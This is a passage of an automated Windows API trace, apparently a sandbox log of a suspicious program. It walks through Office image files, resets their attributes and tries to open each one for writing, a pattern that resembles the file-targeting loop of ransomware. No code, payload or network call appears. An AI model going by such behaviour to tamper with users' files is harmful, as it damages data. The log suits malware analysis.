SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF", dwFileAttributes=0x80) returned 0 [0135.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14533_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.838] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.838] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.838] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.838] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF", dwFileAttributes=0x80) returned 0 [0135.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14565_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.839] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.839] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.839] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.840] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF", dwFileAttributes=0x80) returned 0 [0135.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14578_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.840] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.840] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.840] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF", dwFileAttributes=0x80) returned 0 [0135.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14579_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.841] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.841] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.841] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.841] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF", dwFileAttributes=0x80) returned 0 [0135.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14580_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.842] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.842] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.842] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF", dwFileAttributes=0x80) returned 0 [0135.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14581_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.842] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.842] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.842] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF", dwFileAttributes=0x80) returned 0 [0135.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.843] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.843] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.844] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF", dwFileAttributes=0x80) returned 0 [0135.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14583_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.845] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.845] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.845] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF", dwFileAttributes=0x80) returned 0 [0135.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14654_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.845] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.846] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.846] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.846] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF", dwFileAttributes=0x80) returned 0 [0135.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14655_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.847] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF", dwFileAttributes=0x80) returned 0 [0135.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14656_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.847] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF", dwFileAttributes=0x80) returned 0 [0135.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14691_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.848] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.848] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.848] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF", dwFileAttributes=0x80) returned 0 [0135.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14692_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.849] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.849] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.849] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF", dwFileAttributes=0x80) returned 0 [0135.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14693_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.849] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.850] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF", dwFileAttributes=0x80) returned 0 [0135.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14752_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.851] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.851] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF", dwFileAttributes=0x80) returned 0 [0135.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14753_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.851] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.851] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.851] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF", dwFileAttributes=0x80) returned 0 [0135.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14754_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.852] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF", dwFileAttributes=0x80) returned 0 [0135.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14755_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.852] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF", dwFileAttributes=0x80) returned 0 [0135.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14756_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.853] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF", dwFileAttributes=0x80) returned 0 [0135.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14757_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.854] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.854] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.854] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF", dwFileAttributes=0x80) returned 0 [0135.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14790_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.855] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.855] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.855] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.855] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF", dwFileAttributes=0x80) returned 0 [0135.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14791_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.856] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF", dwFileAttributes=0x80) returned 0 [0135.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14792_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.856] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF", dwFileAttributes=0x80) returned 0 [0135.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14793_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.857] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.857] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.857] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF", dwFileAttributes=0x80) returned 0 [0135.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14794_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.858] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.858] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF", dwFileAttributes=0x80) returned 0 [0135.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14795_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.859] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.859] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF", dwFileAttributes=0x80) returned 0 [0135.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14828_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.860] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.860] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF", dwFileAttributes=0x80) returned 0 [0135.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14829_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.860] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.860] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF", dwFileAttributes=0x80) returned 0 [0135.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14830_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.861] VirtualFree (lpAddress=0x350000, 